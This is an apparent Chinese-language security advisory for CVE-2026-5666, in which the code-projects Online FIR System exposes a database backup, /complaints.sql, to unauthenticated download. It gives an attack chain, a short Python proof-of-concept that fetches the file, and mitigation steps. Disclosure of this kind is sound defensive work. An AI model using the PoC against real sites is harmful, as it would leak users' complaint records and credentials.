CVE-2026-5666 CVSS 5.3 中危

CVE-2026-5666 Online FIR系统敏感信息泄露漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5666

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online FIR System

漏洞概述

code-projects Online FIR System 1.0版本存在敏感信息泄露漏洞。该漏洞源于SQL数据库备份文件处理组件中的/complaints.sql文件未受到适当的访问控制或安全存储保护。由于该文件直接暴露在Web目录下，未经身份验证的远程攻击者可直接访问并下载此数据库备份文件。这可能导致系统中的敏感数据（如用户信息、投诉记录等）被完全泄露，目前该漏洞的利用代码已公开。

技术细节

该漏洞产生于code-projects Online FIR System 1.0版本中SQL数据库备份文件处理组件的不安全配置。具体来说，系统生成的数据库备份文件`complaints.sql`被放置在Web服务器可公开访问的目录下，且未实施任何身份验证或访问控制列表（ACL）限制。攻击者无需用户交互，仅需通过网络发送针对该路径的简单HTTP请求即可下载该文件。获取该SQL文件后，攻击者可离线解析，从而获取系统中存储的敏感数据，严重威胁用户隐私和数据机密性。

攻击链分析

STEP 1

侦察与发现

攻击者识别出目标正在运行code-projects Online FIR System，并确定其版本为1.0。

STEP 2

利用漏洞

攻击者构造针对`/complaints.sql`路径的HTTP GET请求，无需认证直接访问该文件。

STEP 3

数据获取

服务器响应请求，返回包含敏感数据的数据库备份文件内容。

STEP 4

数据分析

攻击者下载并解析SQL文件，提取其中的用户凭证、投诉记录等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-5666: Sensitive Information Disclosure via exposed SQL backup
import requests

def check_vulnerability(target_url):
    # The vulnerable endpoint is the exposed backup file
    backup_url = f"{target_url.rstrip('/')}/complaints.sql"
    
    try:
        response = requests.get(backup_url, timeout=10)
        if response.status_code == 200 and 'CREATE TABLE' in response.text:
            print(f"[+] Vulnerability confirmed! Database backup found at: {backup_url}")
            print(f"[+] Content length: {len(response.text)} bytes")
            return True
        else:
            print(f"[-] Target does not appear to be vulnerable. Status: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    target = "http://127.0.0.1/Online_FIR_System" # Replace with actual target
    check_vulnerability(target)

影响范围

code-projects Online FIR System 1.0

防御指南

临时缓解措施

建议管理员立即删除网站根目录下的`complaints.sql`文件，并检查是否存在其他备份文件泄露。同时，修改数据库访问凭证以防凭证泄露带来的进一步风险。应制定严格的备份文件管理策略，确保备份文件不存放在Web可访问目录中。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表